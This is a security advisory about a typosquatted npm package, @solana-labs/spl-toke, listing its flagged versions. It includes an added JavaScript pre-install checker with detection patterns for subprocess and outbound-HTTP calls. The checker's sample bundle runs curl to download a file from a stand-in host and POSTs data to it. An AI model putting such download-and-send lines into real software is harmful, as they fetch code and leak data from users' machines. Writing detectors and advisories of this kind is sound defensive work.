Malicious package

@solana-labs/spl-toke (npm)

Malicious code in @solana-labs/spl-toke (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5787
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall @solana-labs/spl-toke

What this malware does

Package name @solana-labs/spl-toke is a one-character omission of the legitimate @solana-labs/spl-token package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of require('child_process'), curl invocations, fetch( calls, and POST request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess + outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.
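The two signals described above (a one-character omission of a legitimate scoped name, plus subprocess and outbound-HTTP primitives co-occurring in a bundle that should be a thin client) can be turned into a pre-install check. The following is an added example written for this advisory, not code from the package, the finder or the publisher; the allow-list, the regexes, the "two or more primitives" threshold and the sample bundle text are all assumptions constructed for illustration.

```javascript
// Added example: heuristic pre-install check mirroring the advisory's two signals.
// The allow-list, regexes, threshold and sample bundle below are constructed assumptions.
const LEGIT_PACKAGES = ['@solana-labs/spl-token'];
// Flagged versions as listed in the advisory.
const FLAGGED = {
  '@solana-labs/spl-toke': ['1.0.0', '1.0.5', '1.0.6', '1.0.7', '1.0.8', '1.0.10', '1.98.111', '1.98.112'],
};

// True when `candidate` equals `legit` with exactly one character deleted.
function isOneCharOmission(candidate, legit) {
  if (candidate.length !== legit.length - 1) return false;
  for (let i = 0; i < legit.length; i++) {
    if (legit.slice(0, i) + legit.slice(i + 1) === candidate) return true;
  }
  return false;
}

// Returns the legitimate package a name typosquats, or null.
function typosquatTarget(name) {
  return LEGIT_PACKAGES.find((l) => isOneCharOmission(name, l)) || null;
}

// Primitives the advisory reports co-occurring in lib/index.cjs.js and lib/index.esm.js.
const PRIMITIVES = {
  child_process: /require\(\s*['"]child_process['"]\s*\)/,
  curl: /\bcurl\s+/,
  fetch: /\bfetch\s*\(/,
  post: /['"]POST['"]/,
};
function suspiciousPrimitives(source) {
  return Object.entries(PRIMITIVES).filter(([, re]) => re.test(source)).map(([k]) => k);
}

// Block on a known-flagged version, or on typosquat + at least two suspicious primitives.
function assess(name, version, bundleSource) {
  const target = typosquatTarget(name);
  const prims = suspiciousPrimitives(bundleSource);
  const flaggedVersion = (FLAGGED[name] || []).includes(version);
  const block = flaggedVersion || (target !== null && prims.length >= 2);
  return { target, prims, flaggedVersion, verdict: block ? 'block' : 'allow' };
}

// Constructed sample resembling the bundle shape the advisory describes (not real package code).
const SAMPLE_BUNDLE = `
const cp = require('child_process');
cp.exec('curl -s https://example.invalid/x -o /tmp/x');
fetch('https://example.invalid/c', { method: 'POST', body: 'data' });
`;
console.log(assess('@solana-labs/spl-toke', '1.0.5', SAMPLE_BUNDLE));
```

Run it against the unpacked tarball contents before `npm install` finishes (for example from a preinstall step in CI) rather than after the package has already executed.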

Malicious versions

8 flagged
1.0.0, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.10, 1.98.111, 1.98.112

Indicators of compromise (SHA-256)

Frequently asked questions

No. @solana-labs/spl-toke on npm has been identified as a malicious package (versions 1.0.0, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.10, 1.98.111, 1.98.112 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006587, IN-MAL-2026-006575, IN-MAL-2026-006581, IN-MAL-2026-006577, IN-MAL-2026-006579, IN-MAL-2026-006574, IN-MAL-2026-006584, IN-MAL-2026-006582, IN-MAL-2026-006573, IN-MAL-2026-006586, IN-MAL-2026-006585, IN-MAL-2026-006580, IN-MAL-2026-006576, IN-MAL-2026-006578, IN-MAL-2026-006588, IN-MAL-2026-006583

Credits

  • Amazon Inspector · finder
